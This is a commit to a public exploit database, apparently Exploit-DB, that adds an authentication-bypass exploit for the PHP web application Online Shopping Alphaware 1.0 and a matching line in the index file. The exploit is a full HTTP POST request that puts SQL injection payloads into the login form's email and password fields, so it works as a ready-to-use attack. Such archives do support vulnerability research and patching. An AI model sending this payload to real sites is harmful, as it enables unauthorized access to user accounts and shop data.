DB: 2020-07-31

1 changes to exploits/shellcodes

Online Shopping Alphaware 1.0 - Authentication Bypass
This commit is contained in:
Offensive Security 2020-07-31 05:02:04 +00:00
parent 8a30306a81
commit 3e56299335
2 changed files with 25 additions and 0 deletions

View file

@ -0,0 +1,24 @@
# Title: Online Shopping Alphaware 1.0 - Authentication Bypass
# Exploit Author: Ahmed Abbas
# Date: 2020-07-28
# Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14368&title=Online+Shopping+Alphaware+in+PHP%2FMysql
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
# Malicious POST Request to https://TARGET
POST /alphaware/index.php HTTP/1.1
Host: 172.16.65.130
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.65.130/alphaware/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
DNT: 1
Connection: close
Cookie: PHPSESSID=gqhv9sl4d1bdtr4pspm887ft2n
Upgrade-Insecure-Requests: 1
email='+or+1%3d1%3b+--+ahmed&password='+or+1%3d1%3b+--+ahmed&login=Login

View file

@ -42967,3 +42967,4 @@ id,file,description,date,author,type,platform,port
48722,exploits/hardware/webapps/48722.txt,"Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion",2020-07-28,0xmmnbassel,webapps,hardware,
48723,exploits/hardware/webapps/48723.sh,"Cisco Adaptive Security Appliance Software 9.7 - Unauthenticated Arbitrary File Deletion",2020-07-29,0xmmnbassel,webapps,hardware,
48724,exploits/php/webapps/48724.txt,"Wordpress Plugin Maintenance Mode by SeedProd 5.1.1 - Persistent Cross-Site Scripting",2020-07-29,"Jinson Varghese Behanan",webapps,php,
48725,exploits/php/webapps/48725.txt,"Online Shopping Alphaware 1.0 - Authentication Bypass",2020-07-30,"Ahmed Abbas",webapps,php,

Can't render this file because it is too large.